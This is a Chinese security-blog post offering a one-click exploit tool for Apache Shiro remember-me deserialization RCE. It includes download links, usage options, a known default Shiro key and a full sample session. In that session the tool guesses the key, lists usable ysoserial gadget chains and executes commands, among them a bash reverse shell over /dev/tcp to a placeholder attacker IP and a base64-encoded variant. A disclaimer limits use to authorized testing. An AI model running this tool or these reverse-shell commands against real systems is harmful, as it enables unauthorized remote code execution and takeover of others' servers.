JAVA安全网JAVA安全网

生命不息,折腾不止。
--JAVA人自留地。

Shiro RCE/反序列/命令执行一键利用工具

Apache_Shiro_Logo.svg.png

工具仅供安全自测,未经授权不得非法测试!使用工具请遵守《中华人民共和国网络安全法》。


工具来源紫霞仙子
github: https://github.com/wyzxxz/shiro_rce
先知: https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip
javasec: shiro_tool.zip
MD5 (shiro_tool.zip) = 514163c082fe125f19168be37e1ad254

2021-03-31:
新增自定义或随机useragent
randomagent --> random useragent
useragent= --> set useragent
cookiename= --> default: rememberMe

2020-10-16:
放出来一些功能:
1、spring/tomcat回显,执行命令的时候,x=whoami 就行
2、批量检测是否shiro
3、目标服务器不出网的情况下探测

2020-05-25:
集成原生ysoserial版本,更稳定,download_url: https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip

java -cp shiro_tool.jar Shiro https://xx.xx.xx.xx nslookup/ping1/ping2/curl nocheck key=kPH+bIxk5D2deZiIxcaaaA== req=1.txt keys=key.txt
nslookup/ping1/ping2/curl--> use nslookup dnslog.com check./use ping -c 1 dnslog.com check(default)./use ping -n 1 dnslog.com check./use curl dnslog.com check.
nocheck --> skip check target is shiro or not.
key= --> set a shiro key.
req= --> request body file 抓包保存到文件里,这里写文件名
keys= --> keys file  自定义key的文件,key按行分割,即每行写一个

[admin@ shiro]java -cp shiro_tool.jar Shiro https://xx.xx.xx.xx/          
[-] target: https://xx.xx.xx.xx/
[-] target is use shiro
[-] start guess shiro key.
[-] shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check URLDNS
[*] find: URLDNS can be use
[-] check CommonsBeanutils1
[*] find: CommonsBeanutils1 can be use
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[*] find: CommonsCollections10 can be use
[-] check Groovy1
[*] find: Groovy1 can be use
[-] check JSON1
[*] find: JSON1 can be use
[-] check Spring1
[*] find: Spring1 can be use
[-] check Spring2
[-] check JRMPClient
[*] find: JRMPClient can be use
[*] JRMPClient please use: java -cp shiro_tool.jar ysoserial.exploit.JRMPListener 
0: URLDNS
1: CommonsBeanutils1
2: CommonsCollections10
3: Groovy1
4: JSON1
5: Spring1
6: JRMPClient
[-] please enter the number(0-6)
4
[-] use gadget: JSON1
[*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[*] command example: curl dnslog.xx.com
[*] if need base64 command, input should startwith bash=/powershell=/python=/perl= 
[-] please enter command, input q or quit to quit
> curl json.dnslog.xx.cn
[-] start process command: curl json.dnslog.xx.cn
[-] please enter command, input q or quit to quit
> bash=bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1
[-] start process command: bash -c {echo,YmFzaD1iYXNoIC1pID4mIC9kZXYvdGNwL3h4Lnh4Lnh4Lnh4LzgwIDA+JjE=}|{base64,-d}|{bash,-i}
[-] please enter command, input q or quit to quit
> quit
[-] start process command: quit
[-] quit

未经允许不得转载:JAVA安全网 » Shiro RCE/反序列/命令执行一键利用工具

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址